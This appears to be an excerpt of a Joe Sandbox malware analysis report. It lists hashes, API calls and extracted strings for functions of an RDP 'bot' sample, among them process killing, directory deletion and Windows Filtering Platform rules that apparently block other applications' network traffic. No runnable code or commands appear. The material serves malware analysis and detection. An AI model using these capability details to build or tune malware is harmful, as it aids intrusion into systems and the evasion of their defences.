                                                      • Opcode ID: 378ab548b62ab026256bcbecf8073dcd6dd962d7fa094b9cf604b5146a34c438
                                                      • Instruction ID: e12e56e390701b08da0eaddf78755e8398b6a64fb1c28d00fc8622a2c4e4b460
                                                      • Opcode Fuzzy Hash: 378ab548b62ab026256bcbecf8073dcd6dd962d7fa094b9cf604b5146a34c438
                                                      • Instruction Fuzzy Hash: 4FA00213D9DE02D4E6000B41D9C16B06238E72F311F042431D0199A4658D6C9540851A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                                                      • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                                                      • API String ID: 3326156344-4160762685
                                                      • Opcode ID: 9684c7817d2b89dd82b271affbb1874d8093c4edd663902d43bdccb5249f42f4
                                                      • Instruction ID: a2dd7e33757fb1a931d742487c276f1d97de15398675aa6ba1c04e66c140615a
                                                      • Opcode Fuzzy Hash: 9684c7817d2b89dd82b271affbb1874d8093c4edd663902d43bdccb5249f42f4
                                                      • Instruction Fuzzy Hash: B1F1F750E8C603C7FE65569AAAC03791270EF3F755E240436FA0ECF2E2DD5DAD85920A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                                      • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                      • API String ID: 2460052984-4087913290
                                                      • Opcode ID: 2b43407fb40812be003df21873016ce3dca91500fd4b34bac2934c2be9073314
                                                      • Instruction ID: 24deb5dfc77a8e9008047b49208040edf87686cfdf2deefbadd142339ce0201f
                                                      • Opcode Fuzzy Hash: 2b43407fb40812be003df21873016ce3dca91500fd4b34bac2934c2be9073314
                                                      • Instruction Fuzzy Hash: 3CA19221D4D683C6EE208B18A7943FA6371EFAE345F540032F54DCE695EE3CE94A8709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strlen$strcatstrcpy$strcmp
                                                      • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                      • API String ID: 2140730755-3699962909
                                                      • Opcode ID: 32065dab922eb16873fdd4e86eae5118828848c3aacaff6a512e0109f51071df
                                                      • Instruction ID: 10711698176b01bc74c57154d8493745e53878f3e64633a51fbb736deabc2ad1
                                                      • Opcode Fuzzy Hash: 32065dab922eb16873fdd4e86eae5118828848c3aacaff6a512e0109f51071df
                                                      • Instruction Fuzzy Hash: 20C1846194D682C2FE219A19A7843FA6271FF6A344F840036FA4D8F695EF6CE605C70D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                                                      • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                                                      • API String ID: 3826151639-1775164968
                                                      • Opcode ID: 808b03ec39ad6f7e4897e1658db8f36ae615b9cf3e59cba8cdb0ff454670df4e
                                                      • Instruction ID: d00cf3845d7ba9f47ce16df75d852b6d41899d4db6df9ba442d1c4c1e5c64290
                                                      • Opcode Fuzzy Hash: 808b03ec39ad6f7e4897e1658db8f36ae615b9cf3e59cba8cdb0ff454670df4e
                                                      • Instruction Fuzzy Hash: 1C9140A1E4C542C6FEA04718E6907B91276EFAE795F190032F54ECF694DE3CE8898349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
                                                      • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                                                      • API String ID: 3629392964-1470975255
                                                      • Opcode ID: 11509d7dc318c6951894152db2c3eb95f66ab3a05b6d85fb9d0b191f7301a22d
                                                      • Instruction ID: a38431d6e4c4397653d4f5b915e9829ace6de959391cde457d52f5765160e1dc
                                                      • Opcode Fuzzy Hash: 11509d7dc318c6951894152db2c3eb95f66ab3a05b6d85fb9d0b191f7301a22d
                                                      • Instruction Fuzzy Hash: A4A1942260D7C2C6E761CB19B58039AB7B5EB96740F044134EACD8BB99EF7DC444CB45
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                                                      • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                                                      • API String ID: 2990311666-1793103013
                                                      • Opcode ID: da94db41fa5749e2168b4c5b0c2792bc5edf629c1c334342347b7905099d406d
                                                      • Instruction ID: 8fe782a7c67d9d04856caf9e957ed0761bf43ac4e6d909288563357829f9b596
                                                      • Opcode Fuzzy Hash: da94db41fa5749e2168b4c5b0c2792bc5edf629c1c334342347b7905099d406d
                                                      • Instruction Fuzzy Hash: 0191B62160DBC2D5E761DB19B48039AB7B2EBAA740F144134EACC8BB99EF3DC145CB05
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                      • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                      • API String ID: 1104438493-1059260517
                                                      • Opcode ID: 070307e4c8645b09abb560ad24502875dae9e690aa16ba2f09ebd2749ca33e2d
                                                      • Instruction ID: e5eda4692e7ce37c75df613236874ec719969a0145c5457967776cf5ec9a16be
                                                      • Opcode Fuzzy Hash: 070307e4c8645b09abb560ad24502875dae9e690aa16ba2f09ebd2749ca33e2d
                                                      • Instruction Fuzzy Hash: C8716C51E5C243D3FF604B58AA847BD1672EB7E744F580132F90E8E696DE6CE8468309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                                                      • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                                                      • API String ID: 1879646588-710610406
                                                      • Opcode ID: b8dfa760788b603add58484a8a4d436d7d672801e8d78d7ee9c84c828399f387
                                                      • Instruction ID: 6c1273bdaf1286956426a86f91970e4a19e45b22d605a622935287f0ddf8f273
                                                      • Opcode Fuzzy Hash: b8dfa760788b603add58484a8a4d436d7d672801e8d78d7ee9c84c828399f387
                                                      • Instruction Fuzzy Hash: 9B817E62E4C517C3FF619A1CA6886BC5270EF2A794F150036E95EDF2A4DE2CAC458389
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: AttributesErrorFileLast
                                                      • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                      • API String ID: 1799206407-3397184676
                                                      • Opcode ID: 6be7d6a2cb7f3a98685fd9e65aa2ebdd5b2300d699eedd8d9a08babb2a0e194a
                                                      • Instruction ID: fbba9eaa1d673a1f6e55ce2d358878f2eee765ac6d376b110390805fa9bbef91
                                                      • Opcode Fuzzy Hash: 6be7d6a2cb7f3a98685fd9e65aa2ebdd5b2300d699eedd8d9a08babb2a0e194a
                                                      • Instruction Fuzzy Hash: 57515EB0D8C617D3FEB05B09A7883BD2270AF2EB94E540132F95F8E594EE6DA5458309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                      • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                      • API String ID: 1721699506-2819899730
                                                      • Opcode ID: e16da2df85cf769ba2e277f4be1a100988b21d28fa337b9003040fbccfaadd4b
                                                      • Instruction ID: abb816aa5a70fbb9d1e26048ce717c0e0fb8271717f652b67c315b4d0104a76d
                                                      • Opcode Fuzzy Hash: e16da2df85cf769ba2e277f4be1a100988b21d28fa337b9003040fbccfaadd4b
                                                      • Instruction Fuzzy Hash: 6E6139A1E5C547D2FE208B1CEA803B83275EB6A744F194036E50DCF698EE7DE946834D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strlen
                                                      • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                      • API String ID: 39653677-3302659514
                                                      • Opcode ID: d83c6a3c5cd261ce9a318162082d5d79cdfe15b1520245b8fa0dadd1a1ca9e88
                                                      • Instruction ID: f88547cbf62fc5a5e807cb057d0dc66dce3baa405ab2afbd6d5cfed64a21648f
                                                      • Opcode Fuzzy Hash: d83c6a3c5cd261ce9a318162082d5d79cdfe15b1520245b8fa0dadd1a1ca9e88
                                                      • Instruction Fuzzy Hash: 89415FA1D58543C2FE218F5CA7803F92271BF6A744F584132FA5E8F699EE7CE5068308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Heap$Processstrlen$AllocFree
                                                      • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                      • API String ID: 1318626975-3964590784
                                                      • Opcode ID: 4404ab7bd78e9f675a43a75cd588106154e51a932e660b712f82990b79d880dd
                                                      • Instruction ID: 2566092b0a45ac1126ab46e7ef0534e30ba0e011e404262d87b6f1a1f29bb58f
                                                      • Opcode Fuzzy Hash: 4404ab7bd78e9f675a43a75cd588106154e51a932e660b712f82990b79d880dd
                                                      • Instruction Fuzzy Hash: 6431BF21E49A43C6FE509F19EA843B92270EF6AB84F480035F90DCF6A5DF3CE8058758
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile$ErrorLast
                                                      • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                      • API String ID: 365566950-3085771803
                                                      • Opcode ID: 8aa29dc37d62777a809154e9360e5bfa92268c89cb73e41a97105e0a2c2a5b39
                                                      • Instruction ID: 5ccf3a80f8b7d1dcf7aa8cf8ed29ab6a9d3ae6d858d795afe79f04caa8837742
                                                      • Opcode Fuzzy Hash: 8aa29dc37d62777a809154e9360e5bfa92268c89cb73e41a97105e0a2c2a5b39
                                                      • Instruction Fuzzy Hash: 97515361D4C747C7FE608B189B8827D6270EF2A744F244032F55ECE6A5EE6CE945C709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                                      • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                      • API String ID: 497672076-1436771859
                                                      • Opcode ID: d869a549eb8474e760af3095ab5c6dc71d70420fef9985a515a8ade6337b116d
                                                      • Instruction ID: d1000acebb022640bce2d3cdf8c624c25e6d1ca2ea6ec82120fd965e54f17e5d
                                                      • Opcode Fuzzy Hash: d869a549eb8474e760af3095ab5c6dc71d70420fef9985a515a8ade6337b116d
                                                      • Instruction Fuzzy Hash: C24140B1F5C543D2FE20871DE7846B826B0EF7BB58F140232E51E8F5E99E2CA5468349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
